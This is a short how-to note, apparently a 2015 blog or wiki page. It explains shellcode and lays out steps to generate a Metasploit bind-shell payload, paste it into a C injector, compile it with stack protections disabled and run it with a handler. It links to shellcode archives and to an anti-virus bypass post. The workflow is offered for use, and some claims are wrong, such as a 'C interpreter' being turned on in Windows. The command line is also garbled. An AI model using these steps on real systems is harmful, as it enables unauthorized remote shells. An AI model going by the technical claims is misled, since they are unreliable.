In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode, because the function of a payload is not limited to merely spawning a shell.
shellcode wikipedia: http://en.wikipedia.org/wiki/Shellcode
"UNIX/BSD exec.c FUNTION"
Build shellcode using Metasploit and execute it using this injector written in C
This 'injector', written in C, only works on UNIX/BSD-based distros, and on Windows if they have the C interpreter turned on (on UNIX systems C is active by default). We just need to inject our shellcode into the exec.c function 'unsigned char buf [] =' and compile it using gcc to make it executable under UNIX/BSD-based distros...
To install the gcc package and kernel sources on a Debian/Ubuntu Linux distribution, type in a terminal: apt-get install gcc make linux-headers-$(uname -r)
"HOW TO BUILD/RUN"GENERATING:msfpayloadlinux/x86/shell_bind_tcpLHOST=192.168.1.68LPORT=666C>>shellcode.txtPASTE:shellcodeintotheexec.cinjector"unsigned char code[] ="COMPILING:gcc-fno-stack-protector-zexecstackexec.c-oshellcodeHANDLER:msfcliexploit/multi/handlerPAYLOAD=linux/x86/shell_bind_tcpLHOST=192.168.1.68LPORT=666EEXECUTE:./shellcode
project shellcode: http://www.projectshellcode.com/?q=node/12
reverse_tcp_bind_shell(92bytes): http://www.exploit-db.com/exploits/25497/
http://penturalabs.wordpress.com/2014/07/18/execute-shellcode-bypassing-anti-virus/
http://pentesterconfessions.blogspot.pt/2007/10/overview-this-will-be-quick-article.html
shell-storm: http://shell-storm.org/shellcode/
exploit-db: http://www.exploit-db.com/shellcode/
exec.c (C function): http://pastebin.com/WkBEWM8x
Last edit: pedro ubuntu 2015-01-04